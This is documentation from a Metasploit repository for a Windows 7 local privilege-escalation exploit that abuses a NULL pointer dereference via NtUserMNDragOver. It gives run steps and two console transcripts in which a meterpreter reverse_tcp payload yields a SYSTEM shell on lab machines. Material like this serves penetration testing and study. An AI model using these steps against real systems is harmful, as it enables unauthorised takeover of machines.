adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/windows/local/ntusermndragover.md
T
Grant Willcox 2fb379374f Update documentation where possible for changed exploits
2021-07-23 12:34:12 -05:00

120 lines
4.1 KiB
Markdown
Raw Blame History

## Vulnerable Application
This module exploits a NULL pointer dereference vulnerability in
MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system
call.
The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint()
function does not effectively check the validity of the tagPOPUPMENU
objects it processes before passing them on to MNGetpItemFromIndex(),
where the NULL pointer dereference will occur.
This module has been tested against Windows 7 x86 SP0 and SP1.
Offsets within the solution may need to be adjusted to work with
other versions of Windows, such as Windows Server 2008.
## Verification Steps
1. Get a non-SYSTEM meterpreter session on Windows 7 x86
1. `use exploit/windows/local/ntusermndragover`
1. `set session <session>`
1. `set payload windows/meterpreter/reverse_tcp`
1. `set LHOST <LHOST>`
1. `set LPORT 5555`
1. `exploit`
1. Get a SYSTEM session
## Scenarios
### Windows 7 SP0 x86
```
msf5 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows User-PC\User @ USER-PC 192.168.56.1:4444 -> 192.168.56.15:49158 (192.168.56.15)
msf5 exploit(multi/handler) > use exploit/windows/local/ntusermndragover
msf5 exploit(windows/local/ntusermndragover) > set session 1
session => 1
msf5 exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(windows/local/ntusermndragover) > set LPORT 5555
LPORT => 5555
msf5 exploit(windows/local/ntusermndragover) > run
[*] Started reverse TCP handler on 192.168.56.1:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[+] Reflectively injecting the exploit DLL and running the exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 192.168.56.15
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.15:49159) at 2020-04-29 17:14:46 +0800
meterpreter > sysinfo
Computer : USER-PC
OS : Windows 7 (6.1 Build 7600).
Architecture : x86
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
### Windows 7 SP1 x86
```
msf5 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows User-PC\User @ USER-PC 192.168.56.1:4444 -> 192.168.56.5:49157 (192.168.56.5)
msf5 exploit(multi/handler) > use exploit/windows/local/ntusermndragover
msf5 exploit(windows/local/ntusermndragover) > set session 1
session => 1
msf5 exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(windows/local/ntusermndragover) > set LPORT 5555
LPORT => 5555
msf5 exploit(windows/local/ntusermndragover) > run
[*] Started reverse TCP handler on 192.168.56.1:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 2696 launched.
[*] Injecting exploit into 2696 ...
[*] Exploit injected. Injecting payload into 2696...
[*] Payload injected. Executing exploit...
[*] Sending stage (176195 bytes) to 192.168.56.5
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.5:49158) at 2020-04-29 17:18:00 +0800
meterpreter > sysinfo
Computer : USER-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x86
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
Reference in New Issue View Git Blame Copy Permalink